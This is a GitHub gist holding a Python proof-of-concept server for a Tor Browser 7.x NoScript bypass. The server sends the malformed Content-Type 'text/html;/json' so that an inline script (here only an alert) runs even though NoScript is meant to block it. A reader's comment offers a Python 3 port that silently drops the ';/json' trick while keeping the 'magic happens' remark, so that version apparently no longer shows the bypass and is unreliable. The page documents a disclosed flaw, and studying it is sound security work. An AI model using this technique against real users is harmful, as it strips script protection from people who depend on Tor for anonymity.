Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Tor Browser 7.x NoScript bypass vulnerability https://twitter.com/Zerodium/status/1039127214602641409
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
PORT_NUMBER = 31337
class myHandler(BaseHTTPRequestHandler):
#Handler for the GET requests
def do_GET(self):
self.send_response(200)
self.send_header('Content-type','text/html;/json') # Here is where the magic happens
self.end_headers()
self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>")
return
try:
server = HTTPServer(('', PORT_NUMBER), myHandler)
print 'Started httpserver on port ' , PORT_NUMBER
server.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
@sparskakyl

This comment has been minimized.

Copy link

commented Sep 10, 2018

2 hacky wacky 4 me

@brammittendorff

This comment has been minimized.

Copy link

commented Sep 10, 2018

Python3 version:

#!/usr/bin/python
from http.server import BaseHTTPRequestHandler, HTTPServer

PORT_NUMBER = 31337

class myHandler(BaseHTTPRequestHandler):

        #Handler for the GET requests
        def do_GET(self):
                self.send_response(200)
                self.send_header('Content-type','text/html') # Here is where the magic happens
                self.end_headers()
                self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>".encode())
                return

try:
        server = HTTPServer(('', PORT_NUMBER), myHandler)
        print('Started httpserver on port %s' % PORT_NUMBER)
        server.serve_forever()

except KeyboardInterrupt:
        print('^C received, shutting down the web server')
        server.socket.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.